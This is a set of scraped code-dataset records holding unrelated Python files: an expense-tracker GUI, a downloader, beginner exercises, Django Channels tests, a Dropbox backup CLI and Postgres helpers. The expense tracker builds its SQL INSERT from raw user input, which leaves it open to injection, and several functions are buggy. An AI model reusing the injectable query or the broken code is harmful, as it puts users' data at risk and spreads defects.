def __init__(self):\n self.app_state: bool = True\n # <------------------- Misc. Functions (Layouts and Updaters and stuff) --------------------> #\n\n def Add_Trans(self, particulars: str, _type: str, amount: float, date: str):\n cursor = conn.cursor()\n\n try:\n cursor.execute(f\"\"\"\n INSERT INTO transactions (\n user_id,\n username,\n particulars,\n exp_type,\n amount,\n exp_date\n )\n VALUES (\n {self.user.user_id},\n '{self.user.uname}',\n '{particulars}',\n '{_type}',\n {amount},\n \"{date}\"\n );\n \"\"\")\n\n conn.commit()\n\n Popup(\"Transaction successfully added.\")\n self.win.Refresh()\n\n except SQLErrors.ProgrammingError:\n PopupError(\"ERROR: Invalid details.\\nRectify and try again.\")\n\n cursor.close()\n\n def Create_Add_Trans_Layout(self):\n layout = [\n [T(\"New Transaction\", font=(\"Helvetica\", 18))],\n [T(\"NOTE:\", font=(\"Helvetica\", 20)), T(\n \"All fields are required to be filled.\")],\n [T(\"Particulars:\"), Multiline(\"Enter details of transaction\",\n autoscroll=True, key=\"Particulars\")],\n [T(\"Transaction type:\"), Combo([\"Select\", \"Credit\", \"Debit\"],\n \"Select\", readonly=True, key=\"new_type\")],\n [T(\"Amount:\"), Input(enable_events=True, key=\"amount\")],\n [T(\"Date Of Transaction:\"), Input(\"YYYY-MM-DD or use the button on the right\",\n key=\"date\"), CalendarButton(\"Select Date\", target=\"date\", format=\"%Y-%m-%d\")],\n [Submit()]\n ]\n\n return layout\n\n def History(self):\n history_values, table, no_of_records = get_transactions(\n self.user.uname)\n\n self.slider = sg.Slider(\n range=(0, no_of_records),\n default_value=no_of_records,\n orientation='h',\n enable_events=True,\n key='slider'\n )\n\n layout = [\n [T(\"Transaction History\", font=(\"Helvetica\", 18))],\n [T(\"All your transactions, in one place. Right click any one to delete or edit it.\")],\n [T('Number of records to be shown:'), self.slider],\n [T(\"Show records from \"),\n Input(f\"{year}-{month}-1\", key=\"start_date\", size=(10, 1)),\n CalendarButton(\"Start date\", target=\"start_date\", default_date_m_d_y=(\n month, 1, year), button_color=(\"white\", \"green\"), format=\"%Y-%m-%d\"),\n T(\"to\"),\n Input(f\"{year}-{month}-{day}\", key=\"end_date\", size=(10, 1)),\n CalendarButton(\"End date\", target=\"end_date\", default_date_m_d_y=(\n month, day, year), button_color=(\"white\", \"red\"), format=\"%Y-%m-%d\")\n ],\n [T(\"Type:\"), Combo([\"All\", \"Credit\", \"Debit\"],\n default_value=\"All\", key=\"used_type\", readonly=True)],\n [T(\"Sort by:\"), Combo([\"Name\", \"Amount\", \"Date of Transaction\"],\n default_value=\"Name\", key=\"sort_by\", readonly=True), Combo([\"Ascending\", \"Descending\"], default_value=\"Ascending\", key=\"asc_or_desc\", readonly=True)],\n [table, Button(\"Refresh\", button_color=(\n \"white\", \"orange\"), bind_return_key=True, key=\"refresh\")],\n\n\n ]\n self.history_active = True\n\n return layout\n\n def update_table(self):\n start, end = self.values['start_date'], self.values[\"end_date\"]\n aod = 'ASC' if self.values[\"asc_or_desc\"] == \"Ascending\" else \"DESC\"\n sort = \"particulars\" if self.values[\"sort_by\"] == \"Name\" else \"amount\" if self.values[\"sort_by\"] == \"Amount\" else \"exp_date\"\n n = self.values[\"slider\"] if self.event == 'slider' else 10000\n new_trans, new_table, new_number_of_trans = get_transactions(\n self.user.user_id,\n int(n),\n start,\n end,\n aod, # a(scending)o(r)d(escending)\n sort\n )\n print(new_trans, new_table, new_number_of_trans)\n\n self.win[\"table\"].Update(new_trans) # Updates table\n\n # Updates max number of records to be possibly displayed\n self.win[\"slider\"].Update(range=(0, new_number_of_trans+1))\n\n # Updates the default value of the slider to be the max\n self.slider.Update(value=new_number_of_trans)\n\n self.win.Refresh()\n\n def create_graph(self):\n\n fig, w, h = get_graph_values(\n self.values['a_start_date'],\n self.values['a_end_date'],\n self.values[\"a_type\"],\n )\n self.figure_agg = draw_figure(\n self.win['canvas'].TKCanvas, fig)\n # <------------------ Main Screens --------------------> #\n\n def Login(self):\n login_active = True\n layout = [\n [T(\"Xpnsit\", **heading_format)],\n [T(\"Username:\"), Input(key=\"user\")],\n [T(\"Password:\"), Input(key=\"pass\", password_char='*')],\n [Button(\"Login\", bind_return_key=True), Button(\"Signup\")]\n ]\n\n win = Window(\"Xpnsit\", layout=layout)\n\n while login_active: # <------------ Event Loop -----------------> #\n event, values = win.Read()\n\n if event is None:\n print(\"Exiting event loop\")\n login_active = False\n self.app_state = False\n win.close()\n del win\n break\n\n if event == \"Login\":\n success = check_login_info(values[\"user\"], values[\"pass\"])\n\n if success == True:\n print(\"Login Successful.\")\n\n self.user_details = get_user_details(values[\"user\"])\n self.user = NewUser(*self.user_details)\n\n win.close()\n\n self.Interface()\n login_active = False\n else:\n PopupError(\n \"ERROR: Username or password incorrect.\\nPlease try again.\")\n\n if event == \"Signup\":\n self.Signup()\n\n def Signup(self):\n signup_active = True\n\n layout = [\n [T(\"Signup for Xpnsit\", **heading_format), ],\n [T(\"First Name:\"), Input(size=(15, 1), key=\"f_name\"), T(\n \" \"), T(\"Last Name:\"), Input(size=(15, 1), key=\"l_name\")],\n [T(\"Username:\", justification='center'),\n Input(size=(35, 1), key=\"user\")],\n [T(\"Password:\", justification='center'), Input(\n size=(35, 1), key=\"pass\", password_char=\"*\")],\n [],\n [T(' '*40), Submit()]\n ]\n\n signup_win = Window(\"Xpnsit - Signup\", layout=layout)\n\n while signup_active: # <------------ Event Loop -----------------> #\n event, values = signup_win.Read()\n\n if event in (None, 'Exit'):\n signup_active = False\n login_active = True\n\n if event == 'Submit':\n self.vals = [values[\"user\"], values[\"pass\"],\n values[\"mail\"], values[\"f_name\"], values[\"l_name\"]]\n if not username_used(self.vals[0]):\n create_account(*self.vals)\n\n # <------------------- Confirmation of Insertion ------------------> #\n success = check_login_info(values[\"user\"], values[\"pass\"])\n\n if success == True:\n print(\"Signup Successful.\")\n Popup(\n \"Signup Successful!\",\n \"Exit this popup to return to the login page\"\n )\n signup_win.close()\n signup_active = False\n login_active = True\n else:\n PopupError(\"ERROR: Username already in usage\",\n title=\"Username already taken\")\n\n def Dashboard(self):\n income, expenses = get_income_and_expense(self.user.uname)\n\n if (income, expenses) == (None, None):\n dash_layout = [\n [T(f\"Welcome {self.user.first_name}\")],\n [T(\"Looks like you have no transactions!\\nGo add one in the Transactions tab.\",\n justification=\"center\")],\n [T(\"-\"*60, text_color=\"gray\")],\n ]\n else:\n dash_layout = [\n [T(f\"Welcome {self.user.first_name}\")],\n [T(f\"Your expenses for {month_name}-{year} are:\"),\n T(str(expenses), font=(\"Arial\", 20))],\n [T(f\"Your income for {month_name}-{year} is:\"),\n T(str(income), font=(\"Arial\", 20))],\n [T(\"-\"*80, text_color=\"gray\")],\n [T(\"Net Profit/Loss:\", font=(\"Segoe\", 18)),\n T(str(income-expenses), font=(\"Arial\", 24))]\n ]\n\n dash_active = True\n\n return dash_layout\n\n def Transactions(self):\n transaction_layout = [\n [T(\"Transactions\", font=(\"Helvetica\", 18))],\n [TabGroup(\n [\n [Tab(\"New Transaction\", self.Create_Add_Trans_Layout())],\n [Tab(\"History\", self.History())]\n ]\n )]\n ]\n\n return transaction_layout\n\n def Analytics(self):\n fig, w, h = get_graph_values()\n\n\n analysis_layout = [\n [T(\"Analytics\", font=(\"Helvetica\", 18))],\n [T(\"Here you can find and generate graphs for your desired timeframe\\nand observe trends in your balance.\")],\n [T(\"Generate for records from \"),\n Input(f\"{year}-{month}-1\", key=\"a_start_date\", size=(10, 1)),\n CalendarButton(\"Start date\", target=\"a_start_date\", default_date_m_d_y=(\n month, 1, year), button_color=(\"white\", \"green\"), format=\"%Y-%m-%d\"),\n T(\"to\"),\n Input(f\"{year}-{month}-{day}\", key=\"a_end_date\", size=(10, 1)),\n CalendarButton(\"End date\", target=\"a_end_date\", default_date_m_d_y=(\n month, day, year), button_color=(\"white\", \"red\"), format=\"%Y-%m-%d\")\n ],\n [T(\"Type:\"), Combo([\"All\", \"Credit\", \"Debit\"],\n default_value=\"All\", key=\"a_type\", readonly=True)],\n [Button(\"Generate\", button_color=(\"white\", \"orange\"))],\n [Canvas(size=(w, h), key=\"canvas\")]\n ]\n\n return analysis_layout\n\n def Interface(self):\n global graph_active\n\n\n layout = [\n [T(\"Xpnsit\", **heading_format), T(\" \"*50), Button(\"Settings\"),\n Button(\"Log Out\", button_color=(\"black\", \"yellow\"))],\n [TabGroup([\n [\n Tab(\"Dashboard\", self.Dashboard(\n ), tooltip=\"See an overview of your account\", font=(\"Arial\", 12)),\n Tab(\"Transactions\", self.Transactions(\n ), tooltip=\"View,add and delete transactions\", font=(\"Arial\", 12), key=\"transactions\"),\n Tab(\"Analytics\", self.Analytics(\n ), tooltip=\"Get a graphical insight to your spendings.\", font=(\"Arial\", 12))\n ]\n ],)]\n ]\n\n self.win = Window(\"Xpnsit v1.0\", layout=layout, size = (590,640),resizable=True)\n while True:\n self.event, self.values = self.win.Read()\n self.figure_agg = self.create_graph()\n\n if self.event == \"Log Out\":\n logout = PopupYesNo(\"Are you sure you want to log out?\")\n\n if logout == 'Yes':\n sg.popup_quick_message(\n \"Okay, closing. Bye\", auto_close_duration=10)\n self.win.close()\n # self.app_state = False\n del self.win\n break\n elif self.event is None:\n self.win.close()\n self.app_state = False\n del self.win\n break\n\n if self.event != sg.TIMEOUT_KEY:\n print(f\"Event = {self.event}\\nValues = {self.values}\\n\")\n\n\n if self.event == \"Submit\":\n _type = \"CR\" if self.values[\"new_type\"] in (\n \"Credit\", \"Select\") else \"DR\"\n self.Add_Trans(\n self.values[\"Particulars\"],\n _type,\n self.values[\"amount\"],\n self.values[\"date\"])\n\n if self.event in (\"slider\", \"refresh\"):\n\n self.update_table()\n self.win.refresh()\n\n if self.event == \"Generate\":\n # self.create_graph()\n delete_figure_agg(self.figure_agg)\n self.create_graph()\n self.win.read()\n self.win.refresh()\n # elif self.event == \"Generate\" and self.figure_agg:\n # canvas = self.win['canvas'].TKCanvas\n\n \n\n # canvas.delete(\"all\")\n # self.win.refresh()\n\n\n\nclass NewUser:\n def __init__(self, *details):\n self.user_id: int = details[0]\n self.uname: str = details[1]\n self.mail_id: str = details[3]\n self.first_name: str = details[4]\n self.last_name: str = details[5]\n self.full_name: str = self.first_name + ' ' + self.last_name\n self.state: bool = True\n\n\n# <---------- MAIN: Calls an instance of the Xpnsit class and starts off with the Login page --------> #\n\nif __name__ == \"__main__\":\n main_win = Xpnsit()\n # app_state = main_win.app_state\n while True:\n print(main_win.app_state)\n if main_win.app_state == True:\n main_win.Login()\n else:\n break\n","repo_name":"kilacoda/Xpnsit","sub_path":"main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":25072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14229318604","text":"def longestConsecutive(nums):\n nums.sort()\n n = len(nums)\n i = 0\n count = 1\n res = []\n print(nums)\n while i <= n - 2:\n while nums[i + 1] == nums[i] + 1 and (i <= n-2):\n i = i + 1\n count = count + 1\n res.append(count)\n count = 1\n i = i + 1\n return max(res)\n\nlongestConsecutive([0, 0, 1, 2, 3, 4, 5, 6, 7, 8])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/longConsecSeq.py","file_name":"longConsecSeq.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30136351090","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n# multi_thread_download.py\n\n\nimport os\nimport threading\nimport urllib.request\nimport urllib.error\nimport shutil\n\nimport utility\nfrom utility import get_file_size, split_file_size, split_file_name, append_file\n\nimport single_thread_download\nfrom single_thread_download import single_thread_download\n\n\n# 各个子线程下载自己负责的那部分内容\ndef sub_thread_download(url, file_name, begin, end):\n\treq = urllib.request.Request(url)\n\treq.add_header('Range', 'bytes=%d-%d' % (begin, end))\n\ttry:\n\t\twith urllib.request.urlopen(req) as response, open(file_name, 'wb') as out_stream:\n\t\t\tshutil.copyfileobj(response, out_stream)\n\texcept urllib.error.URLError as e:\n\t\tprint(e.errno, '\\n', e.reason, '\\n')\n\n\n# 多线程\ndef multi_thread_download(url, file_name=None, overwrite=False, thread_num=4):\n\tif thread_num == 1:\n\t\tsingle_thread_download(url, file_name, overwrite)\n\telif thread_num > 1:\n\t\t# 如果文件名为空,则从 URL 中获取文件名\n\t\tif file_name is None:\n\t\t\tfile_name = url.rpartition('/')[-1]\n\t\t# 潜在 bug:如果不覆盖己有文件,而已有文件不完整(eg. 没下载全),会有潜在影响\n\t\tif os.path.exists(file_name) and (not overwrite):\n\t\t\treturn\n\t\ttarget_size = get_file_size(url)\n\t\tif (target_size < 0):\n\t\t\tprint(\"multi_thread_download(): get_file_size() error!\\n\")\n\t\t\treturn\n\t\tranges = split_file_size(target_size, thread_num)\n\t\tthread_group = []\n\t\tfor i in range(thread_num):\n\t\t\t# print(i, '\\t', ranges[i][0], ',', ranges[i][1])\n\t\t\tt = threading.Thread(target=sub_thread_download, name=\"thread%d\" % i, args=(url, split_file_name(file_name, i), ranges[i][0], ranges[i][1]))\n\t\t\tt.start()\n\t\t\tthread_group.append(t)\n\t\tfor t in thread_group:\n\t\t\tt.join()\n\t\tappend_file(file_name, thread_num, False)\n\n\n# multi_thread_download(\"http://iweb.dl.sourceforge.net/project/zsh/zsh-doc/5.0.5/zsh-5.0.5-doc.tar.bz2\", overwrite=True, thread_num=4)\n# multi_thread_download(\"https://github.com/zeekvfu/sip_tea/archive/master.zip\", overwrite=True, thread_num=4)\n# multi_thread_download(\"http://screencasts.b0.upaiyun.com/podcasts/nil_podcast_1.m4a\", overwrite=False, thread_num=4)\n\n\n\n\n","repo_name":"zeekvfu/sip_tea","sub_path":"multi_thread_download.py","file_name":"multi_thread_download.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74868684000","text":"'''\nCreated on 13 dec. 2018\n\n@author: Iván\n'''\n\nimport math\n\n# Dada una altura pintar una piramide de asteriscos\nfrom builtins import range\n\nn = int(input(\"Introduce el numero de filas del triangulo: \"))\n\nfor i in range(n):\n espacios = n-i;\n print(\" \" * espacios + \"*\" *(i*2+1))\n\n# Pirámide invertida\n\nn = int(input(\"Introduce el numero de filas del triangulo invertido: \"))\n\nfor i in range(n-1 , -1 , -1):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n\n# Pintar un rombo\n\nnr = int(input(\"Tamaño del rombo: \"))\n\ndef rombo (n):\n for i in range(n):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n for i in range(n-2 , -1 , -1):\n print(\" \" * (n-i) + \"*\" * (2*i+1))\n\nrombo(nr)\n\n#Crear una función que devuelva el área de un rectángulo.\n\na = int(input(\"Introduce la base del rectangulo: \"))\nb = int(input(\"Introduce la altura del rectangulo: \"))\n\ndef areaR (a,b):\n return a*b\n\nprint(areaR(a,b))\n\n#– Crear una función que devuelva el perímetro de una circunferencia (utilizando math).\n\nradio = int(input(\"Introduce el radio de la circunferencia: \"))\n\ndef perimetro (r):\n return 2*math.pi*r\n\nprint(perimetro(radio))\n\n#Factorial de un numero\n\nfact = int(input(\"Introduce el numero del que quieres el factorial: \"))\n\ndef factorial (n):\n if n == 0 :\n return 1\n else:\n return n * factorial(n-1)\n\nprint(factorial(fact))\n\n# Crear una funcion que resuelve una ecuacion de segundo grado recibiendo a, b, c\n# B^2 +- 4ac / 2a raiz\n\ndef ecuacionSegundo (a,b,c):\n x = ((b**2 - (4 * a *c)))\n if x<0 :\n return print(\"No hay solucion, factores dentro de la raiz menores que 0\")\n elif x == 0:\n solucion = (-b) / (2*a)\n print(solucion)\n else:\n solucion1 = ((b) - math.sqrt(x) ) / (2*a)\n solucion2 = ((b) + math.sqrt(x) ) / (2*a)\n print(\"Solucion 1: \" + str(solucion1))\n print(\"Solucion 2: \" + str(solucion2))\n\na = int (input(\"Introduce el valor de a: \"))\nb = int (input(\"Introduce el valor de b: \"))\nc = int (input(\"Introduce el valor de c: \"))\necuacionSegundo(a, b, c)\n\n#Crear una función que devuelva una lista con los números primos de 0 a 100.\n\ndef isPrime (n):\n if n < 0 :\n return False\n elif n == 2:\n return True\n else:\n for i in range(2,n):\n if n % i == 0:\n return False\n return True\n\ndef primosLista ():\n l = []\n for i in range(2,100):\n if isPrime(i):\n l.append(i)\n\n return l\n\nprint(primosLista())\n\n\n#Dada una lista, imprimir los elementos en posición par.\n\ndef paresLista (l):\n for i in range(0,len(l), 2):\n print(\"Posicion par \" + str(i) + \": \" + str(l[i]))\n\nlista = [0,4,67,34,55,2,8,10]\nparesLista(lista)\n\n#Un número es perfecto si la suma de sus divisores es igual a si\n#mismo, ejemplo el 28. Crear una función que devuelva si un\n#número es perfecto.\n\ndef divisores (num):\n listaDiv = []\n for i in range(1,num): #Ojo que empezar en 1\n if ((num % i) == 0):\n listaDiv.append(i)\n return listaDiv\n\n\ndef perfecto (num):\n \"\"\"\n Comprueba si el numero es perfecto\n :param num: numero que comprobar\n :return: Perfecto o no\n \"\"\"\n listaAux = divisores(num)\n suma = 0\n for i in range(len(listaAux)):\n suma += listaAux[i]\n if (suma == num) :\n return print(\"Es perfecto\")\n else:\n return print(\"No es perfecto\")\n\ndef sumaL (l):\n suma = 0\n for i in range(len(l)):\n suma += l[i]\n return suma\n\ndef perfecto2 (n):\n l = []\n for i in range(1,n):\n if n % i == 0:\n l.append(i)\n if n == sumaL(l):\n return print(\"Es perfecto\")\n else:\n return print(\"No es perfecto\")\n\nperf = int(input(\"Introduzca el numero que desea comprobar si es perfecto: \"))\nperfecto(perf)\nprint(\"-\")\nperfecto2(perf)\n\n#Crear una función que recibe una lista de números y devuelve\n#una lista de tuplas por cada elemento. Cada tupla tendrá el\n#elemento, su cuadrado y su cubo:\n\ndef listaTuplas (listaN):\n listaF = []\n for i in listaN:\n tupla = (i , i**2 , i*i*i)\n listaF.append(tupla)\n print(listaF)\n\nlista2 = [1,2,3]\nlistaTuplas(lista2)\n\n# Hasta Slyce","repo_name":"IvanPerez9/Programming-Paradigms","sub_path":"Python/Repaso/Tema1/Tema1.py","file_name":"Tema1.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"72313782560","text":"from __future__ import unicode_literals\nfrom django.http import HttpResponse\n\nfrom channels import Channel\nfrom channels.handler import AsgiHandler\nfrom channels.tests import ChannelTestCase\n\n\nclass FakeAsgiHandler(AsgiHandler):\n \"\"\"\n Handler subclass that just returns a premade response rather than\n go into the view subsystem.\n \"\"\"\n\n chunk_size = 30\n\n def __init__(self, response):\n assert isinstance(response, HttpResponse)\n self._response = response\n super(FakeAsgiHandler, self).__init__()\n\n def get_response(self, request):\n return self._response\n\n\nclass HandlerTests(ChannelTestCase):\n \"\"\"\n Tests that the handler works correctly and round-trips things into a\n correct response.\n \"\"\"\n\n def test_basic(self):\n \"\"\"\n Tests a simple request\n \"\"\"\n # Make stub request and desired response\n Channel(\"test\").send({\n \"reply_channel\": \"test\",\n \"http_version\": \"1.1\",\n \"method\": \"GET\",\n \"path\": b\"/test/\",\n })\n response = HttpResponse(b\"Hi there!\", content_type=\"text/plain\")\n # Run the handler\n handler = FakeAsgiHandler(response)\n reply_messages = list(handler(self.get_next_message(\"test\", require=True)))\n # Make sure we got the right number of messages\n self.assertEqual(len(reply_messages), 1)\n reply_message = reply_messages[0]\n # Make sure the message looks correct\n self.assertEqual(reply_message[\"content\"], b\"Hi there!\")\n self.assertEqual(reply_message[\"status\"], 200)\n self.assertEqual(reply_message.get(\"more_content\", False), False)\n self.assertEqual(\n reply_message[\"headers\"],\n [(b\"Content-Type\", b\"text/plain\")],\n )\n\n def test_large(self):\n \"\"\"\n Tests a large response (will need chunking)\n \"\"\"\n # Make stub request and desired response\n Channel(\"test\").send({\n \"reply_channel\": \"test\",\n \"http_version\": \"1.1\",\n \"method\": \"GET\",\n \"path\": b\"/test/\",\n })\n response = HttpResponse(b\"Thefirstthirtybytesisrighthereandhereistherest\")\n # Run the handler\n handler = FakeAsgiHandler(response)\n reply_messages = list(handler(self.get_next_message(\"test\", require=True)))\n # Make sure we got the right number of messages\n self.assertEqual(len(reply_messages), 2)\n # Make sure the messages look correct\n self.assertEqual(reply_messages[0][\"content\"], b\"Thefirstthirtybytesisrighthere\")\n self.assertEqual(reply_messages[0][\"status\"], 200)\n self.assertEqual(reply_messages[0][\"more_content\"], True)\n self.assertEqual(reply_messages[1][\"content\"], b\"andhereistherest\")\n self.assertEqual(reply_messages[1].get(\"more_content\", False), False)\n\n def test_chunk_bytes(self):\n \"\"\"\n Makes sure chunk_bytes works correctly\n \"\"\"\n # Empty string should still return one chunk\n result = list(FakeAsgiHandler.chunk_bytes(b\"\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"\")\n self.assertEqual(result[0][1], True)\n # Below chunk size\n result = list(FakeAsgiHandler.chunk_bytes(b\"12345678901234567890123456789\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"12345678901234567890123456789\")\n self.assertEqual(result[0][1], True)\n # Exactly chunk size\n result = list(FakeAsgiHandler.chunk_bytes(b\"123456789012345678901234567890\"))\n self.assertEqual(len(result), 1)\n self.assertEqual(result[0][0], b\"123456789012345678901234567890\")\n self.assertEqual(result[0][1], True)\n # Just above chunk size\n result = list(FakeAsgiHandler.chunk_bytes(b\"123456789012345678901234567890a\"))\n self.assertEqual(len(result), 2)\n self.assertEqual(result[0][0], b\"123456789012345678901234567890\")\n self.assertEqual(result[0][1], False)\n self.assertEqual(result[1][0], b\"a\")\n self.assertEqual(result[1][1], True)\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/andrewgodwin/channels/channels/tests/test_handler.py","file_name":"test_handler.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30495743165","text":"from settings import IGNORE_DIRS, IGNORE_FILES\nfrom DBoxConnection import DBoxConnection\nfrom datetime import datetime, time\nfrom crontab import CronTab\nfrom pathlib import Path\nimport logging\nimport dropbox\nimport shutil\nimport click\nimport os\n\n\n\n@click.command()\n@click.option(\n \"--from-dir\",\n help=\"Directory to backup/watch if --automatic-sync is enabled\",\n type=click.Path(exists=True),\n required=True \n)\n@click.option(\n \"--to-dir\",\n help=\"Root directory to store the backup\",\n type=click.Path(exists=False),\n required=True\n)\n@click.option(\n \"--backup-start\",\n help=\"Perform the backup in the given time interval (in minutes)\",\n type=click.INT,\n required=True\n)\n@click.option(\n \"--frequency-interval\",\n help=\"Interval of time (in minutes) to perform the backups\",\n type=click.INT,\n required=True\n)\n@click.option(\n \"--automatic-backup\",\n help=\"Whether to perform or not automatic back ups by using cron jobs\",\n type=click.BOOL,\n required=True\n)\n@click.option(\n \"--upload-zip\",\n help=\"If the backup will be uploaded as a zipped file\",\n type=click.BOOL,\n required=True\n)\ndef main(from_dir, to_dir, backup_start, frequency_interval, automatic_backup, upload_zip):\n \"\"\"\n A command line backup tool to keep your files stored at dropbox by using its API. \n It runs at given time intervals specified by the user and can perform automatic\n backups using cronjobs\n \"\"\"\n\n FROM_DIR = Path(from_dir)\n TO_DIR = Path(to_dir)\n BACKUP_START_TIME = backup_start\n FREQUENCY_INTERVAL = frequency_interval\n AUTOMATIC_BACKUP = automatic_backup\n\n logging.basicConfig(\n filename=\"./backup.log\",\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n level=logging.INFO\n )\n\n\n # Dropbox connection object\n # Handling the backup folder creation skip if already exist \n dbox = DBoxConnection()\n \n if dbox.validate_token():\n logging.info(\"The dropbox auth token is valid\")\n else:\n logging.error(\"The dropbox token is not valid, get a new one\")\n\n if TO_DIR.name not in dbox.get_dirs(\"\", only_names=True, recursive=False):\n dbox.create_folder(TO_DIR)\n logging.info(\"The backup directory %s was created in dropbox\")\n else:\n logging.warning(\"The backup directory %s already exists in dropbox\", TO_DIR)\n\n\n # Setting up the cron jobs \n # cron = CronTab(user=True)\n # job = cron.new(command=\"\")\n # job.setall(datetime(year, month, day, hour, minute))\n # datetime.strptime(date_string=)\n\n click.secho(f\"Backing up {str(FROM_DIR)} into {str(TO_DIR)} at {str(BACKUP_START_TIME)} every {str(FREQUENCY_INTERVAL)}\", fg=\"green\")\n\n # Traverse the directory to backup, skip the files and dirs that must be ignored\n VISITED = []\n TMP_DIR = Path.cwd()/\"tmp\"\n try:\n os.mkdir(TMP_DIR)\n except:\n pass\n\n if upload_zip:\n BUILD_PATH = list(TMP_DIR.parts)\n else:\n BUILD_PATH = list(TO_DIR.parts)\n\n print(\"Starting build path = \", BUILD_PATH)\n\n for root, dirs, files in os.walk(FROM_DIR):\n CURRENT_DIR = os.path.basename(root)\n logging.info(\"Visiting %s\", root)\n print(\"Build path -> \", BUILD_PATH)\n if CURRENT_DIR in VISITED:\n VISITED.remove(CURRENT_DIR)\n PARENT_DIR = (\"/\".join(BUILD_PATH))[1:]\n print(PARENT_DIR)\n if upload_zip:\n if CURRENT_DIR not in os.listdir(PARENT_DIR):\n _ = BUILD_PATH.pop()\n else:\n if CURRENT_DIR not in dbox.get_dirs(PARENT_DIR, only_names=True, recursive=False):\n _ = BUILD_PATH.pop()\n BUILD_PATH.append(CURRENT_DIR)\n \n if files:\n os.chdir(root)\n logging.info(\"%s has %s files\", CURRENT_DIR, len(files))\n for FILE in files:\n print(\"File = \", FILE)\n if FILE not in IGNORE_FILES:\n if upload_zip:\n shutil.copy(FILE, \"/\".join(BUILD_PATH)[1:]+\"/\")\n else: \n with open(FILE, 'rb') as f:\n try:\n dbox.upload_content(file=f.read(), path=\"/\".join(BUILD_PATH)[1:]+\"/\"+f.name)\n print(\"File uploaded\")\n except dropbox.exceptions.ApiError as error:\n if error.error.is_path():\n logging.error(\"Path error\")\n else:\n logging.warning(\"Ignoring the file %s\", FILE)\n\n if dirs:\n logging.info(\"%s has %s files\", CURRENT_DIR, len(dirs))\n for DIR in dirs:\n if DIR not in IGNORE_DIRS:\n VISITED.append(DIR)\n try:\n if upload_zip:\n os.mkdir(\"/\".join(BUILD_PATH)[1:]+\"/\"+DIR)\n else:\n dbox.create_folder(\"/\".join(BUILD_PATH)[1:]+\"/\"+DIR) \n logging.info(\"Creating folder %s at %s\", DIR, \"/\".join(BUILD_PATH)[1:])\n except:\n logging.warning(\"Folder %s already exist at %s\", DIR, \"/\".join(BUILD_PATH)[1:])\n else:\n logging.warning(\"Ignoring %s directory\", DIR)\n else:\n logging.info(\"%s has no directories\", CURRENT_DIR)\n if CURRENT_DIR not in IGNORE_DIRS:\n BUILD_PATH.remove(CURRENT_DIR)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# python backup.py --from-dir \"/home/sjukdom/_Narasimha_/_forbackup_/\" --to-dir \"/Backup\" --backup-start 60 --frequency-interval 120 --automatic-backup false","repo_name":"daniel-sjkdm/BackupMySys","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24720068367","text":"import sys\nimport os\nsys.path.insert(0, os.path.dirname(__file__))\nfrom dataclasses import dataclass\nfrom SQLAlchemyConnection import SQLAlchemyConnection\nfrom PsycopgConnection import PsycopgConnection\nfrom files_utilities import get_abs_path, get_all_files_in_dir, parse_file_name_from_path\nimport psycopg2\nimport psycopg2.extensions\nimport logging\nfrom dotenv import load_dotenv\nfrom sqlalchemy.engine import Engine\nimport pandas as pd\n\n@dataclass\nclass DogAnswer:\n dog_id: int\n question_id: int\n answer_id: int\n\n\ndef csv_to_postgres(psyco: PsycopgConnection, file_path: str, *, table_name: str | None = None) -> None:\n \"\"\"Read csv file and insert to postgres database table\"\"\"\n # set table name from file name or argument\n table_name = table_name if table_name else parse_file_name_from_path(\n path=file_path, file_type=\".csv\")\n\n # use cursor\n with psyco.get_cursor() as cursor:\n\n # open csv and skip header line\n with open(file_path, ) as csv_file:\n next(csv_file)\n\n # copy csv to table\n cursor.copy_from(csv_file, table_name, sep=',', null=\"null\")\n\n\ndef create_tables_from_file(psyco: PsycopgConnection, file_path: str) -> None:\n \"\"\"Create tables from sql file\"\"\"\n # execute create tables file\n with open(file_path) as file:\n psyco.execute_command(file.read())\n\n\ndef drop_table(psyco: PsycopgConnection, table_name: str) -> None:\n \"\"\"Drop table with specified name\"\"\"\n psyco.execute_command(f\"DROP TABLE IF EXISTS {table_name}\")\n\n\ndef delete_table_data(psyco: PsycopgConnection, table_name: str) -> None:\n \"\"\"Delete all rows from table\"\"\"\n psyco.execute_command(f\"DELETE FROM {table_name};\")\n\n\ndef update_tables_from_csv_directory(csv_files: list[str]) -> None:\n \"\"\"Update tables from csv files\"\"\"\n # iterate over files paths\n for csv_path in csv_files:\n # get table name\n table_name = parse_file_name_from_path(csv_path, \".csv\")\n\n # delete existing data from table if exists and update data from file\n try:\n delete_table_data(table_name)\n csv_to_postgres(get_abs_path(csv_path))\n # log if the table not exists\n except psycopg2.errors.UndefinedTable:\n logging.error(f\"Error updating table {table_name}\")\n\n\ndef get_xlsx_df(file_path: str) -> pd.DataFrame:\n \"\"\"Read xlsx file with pandas\"\"\"\n return pd.read_excel(get_abs_path(file_path))\n\n\ndef df_to_postgres(df: pd.DataFrame, table_name: str, engine: Engine) -> None:\n \"\"\"Use pandas to_sql to update table\"\"\"\n rows_count = df.to_sql(table_name, con=engine,\n if_exists='replace', index=False)\n logging.info(f\"updated {rows_count} rows for {table_name} table\")\n\n\ndef xlsx_to_postgres(file_path: str, *, table_name: str | None = None) -> None:\n 